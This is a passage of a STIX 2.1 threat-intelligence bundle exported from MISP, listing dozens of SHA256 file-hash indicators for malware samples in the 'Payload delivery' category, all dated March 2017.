"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fca-f838-4a30-844d-4a72950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = '441b1db0595565ac059552790e96524851843b22787238291f286b16c9c951d4']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fcb-2284-4785-9336-4828950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = 'ba6022401ed257f82b7107319a7ec928044acd3dcb60dfab1ac7df2823ffef25']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fcc-3e48-496a-979a-4e29950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = '0a5c9818aa579082af224abc02dad60d77f4ded6533d143100b7744b58e289a2']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fcc-74ec-4d81-85c2-45b6950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = '871cefc4f9faf8658804dbe8332e3b511172ea29545e13c303ae1809edf8a0f6']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fcd-940c-4a86-9a1f-4d73950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = 'bf3869e420ac8686b9ae3b14d679f45b34909ff998887f9fd0c8126853d6a4ed']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fce-b2f4-46fc-ab5a-473a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = '8eef688751eed591bedd2fcc18d32bb84df11fdda62a16c963561aeeae56f6f4']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db5fcf-19b8-46e9-9e25-4031950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated samples",
|
|
"pattern": "[file:hashes.SHA256 = 'c18775abf5c992cbd9b3b0c401fb0ee66bbe092e44b0b1b3cdd17fdc353d825e']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6144-ec20-4cc0-b1ae-4e5a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated sample",
|
|
"pattern": "[file:hashes.SHA256 = 'ea6a8a46b61e2a8813c4146461e4c961dfb2cbcf277d8bb9edfc14be73f9f073']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6145-f6bc-4e54-aafc-47a5950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated sample",
|
|
"pattern": "[file:hashes.SHA256 = '119972c1029267df7c5a8e607a2f034e7f8a3396ea49c67430842e0ff2de70eb']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6146-6dd4-43c5-b51b-49bc950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated sample",
|
|
"pattern": "[file:hashes.SHA256 = '488c93d2e5413b974f489030c1f7484d2a6610cda0dd5a389b6a30371817d108']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6147-73f0-4661-8979-4164950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated sample",
|
|
"pattern": "[file:hashes.SHA256 = '4ebb33fcf64afcd534ac83e72e49a4392b586bd31ef20b7bea2717cb9cde4928']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6148-3588-481a-b04d-4919950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated sample",
|
|
"pattern": "[file:hashes.SHA256 = 'a8779654e5abf142aaaca29b1abc0cbf1f5430e8a8fe7d955ae3ba6f1a9a3747']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db614a-6c88-49cc-b715-4d7a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated sample",
|
|
"pattern": "[file:hashes.SHA256 = '445e1aaa68169f30efa3d7d04f378c646abbbb3515430005b66d9e9ac182006c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db614a-10f4-4c1c-96f6-4f11950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated sample",
|
|
"pattern": "[file:hashes.SHA256 = '417d6ec4701da0396bdffb8da0d582dabde35dedf9d468bcbe36f94df6dcf8e3']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db614b-fc28-4fe9-952c-4b61950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated sample",
|
|
"pattern": "[file:hashes.SHA256 = '8a4748311e74cbf4f66a55ee4561728d0542929e9c260eda6d30bbde054fa53c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db614c-a2b8-464b-9440-4f52950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated sample",
|
|
"pattern": "[file:hashes.SHA256 = '6a71582fb919a1300b98b035eb154602bf5452ff80d364a1f6603240cdbd8293']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db614d-3d9c-4746-945c-44a4950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated sample",
|
|
"pattern": "[file:hashes.SHA256 = 'b01756a3f4b8d687a9fce4301f5f56b4dfb7befe29550096b262935f63f02cc4']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db614e-3084-4445-ad89-4eb0950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated sample",
|
|
"pattern": "[file:hashes.SHA256 = 'b91fbf574bf080af82cd24977d00205dc0860ad7afb01f8f4a0ce0f910f9de6e']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db614f-70f8-4305-af9d-4053950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated sample",
|
|
"pattern": "[file:hashes.SHA256 = '829797843357a5417f4de7b7f8f970ccfaccf30ecc80ed9c15e796897012d3e5']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6150-dc28-4866-a771-45d5950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated sample",
|
|
"pattern": "[file:hashes.SHA256 = 'b10a1189aeb784c899bb5eb46b6cf1528b2ef6e3c0673159db4438e7aa39f6d7']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6151-a804-4897-acd8-4b63950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated sample",
|
|
"pattern": "[file:hashes.SHA256 = '2ba2491ce6a1814206dfe2aa9b1129f6085f1a18fd9b8c831caad286b095ee90']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6151-91a4-40b4-a757-4062950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated sample",
|
|
"pattern": "[file:hashes.SHA256 = '78961c49fa961bac01ebc8ef62077bc8fc8a3389f39fd7ee9d655447f0282fe2']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6152-5bc4-4019-aab5-4e6a950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated sample",
|
|
"pattern": "[file:hashes.SHA256 = 'aaa1511a156a11cff7e09367184972c067b65cae6573a8b4844dbe0a01894118']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6153-ee28-4920-b50c-4320950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated sample",
|
|
"pattern": "[file:hashes.SHA256 = 'e64678633c8e876fc9313bfe5a8401953eaefdd8e7e006221cd5009f471fc389']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6154-d050-47bc-8f1c-4152950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated sample",
|
|
"pattern": "[file:hashes.SHA256 = '2cedcdaa116feed52819914db3f19edf58c004a4a28c62f556d2ce3ced84b0f6']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6155-ab14-4e15-80c0-44b4950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated sample",
|
|
"pattern": "[file:hashes.SHA256 = '417addbd5817cc9dcf4f77f6240a56cd11a94c9a89e646d589e5ed26710cbcac']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6156-dd7c-4879-a1b6-4c7d950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated sample",
|
|
"pattern": "[file:hashes.SHA256 = 'ff19d4f2c6527b2d4ecf65fa85115fddaec5420ef4346e1b6a21b28ccc5604b5']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6157-cf74-43a4-a6a3-4288950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated sample",
|
|
"pattern": "[file:hashes.SHA256 = '6e676f6be660799fbb4037c0c1ad39f9933b3e84cba0642fb7b892465b87325b']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6158-552c-4808-9724-468c950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated sample",
|
|
"pattern": "[file:hashes.SHA256 = 'f9531a1ca3ee933812b709cc07a7d6ab6f8ee9900eee64ad97e936a68c5847e5']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6158-7bc4-4dac-990f-4fab950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated sample",
|
|
"pattern": "[file:hashes.SHA256 = 'df56d66b8d9a16258a0b449084e3d82f8e338f0d0ff140bbcec1848357107dda']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db6159-9c38-4837-ba60-4b79950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated sample",
|
|
"pattern": "[file:hashes.SHA256 = '81ff2560c2f999d51f45b62110a5d37921a94d1af47f694780f9df8ed6c932ca']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha256\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db615a-5b2c-435a-bcbf-4dc3950d210f",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:22:07.000Z",
|
|
"modified": "2017-03-29T09:22:07.000Z",
|
|
"description": "Associated sample",
|
|
"pattern": "[file:hashes.SHA256 = 'f9e6817f348cbfc4ca672ea275f3da390c31b45266e57b1f0f13f7c7ca37a3eb']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:22:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
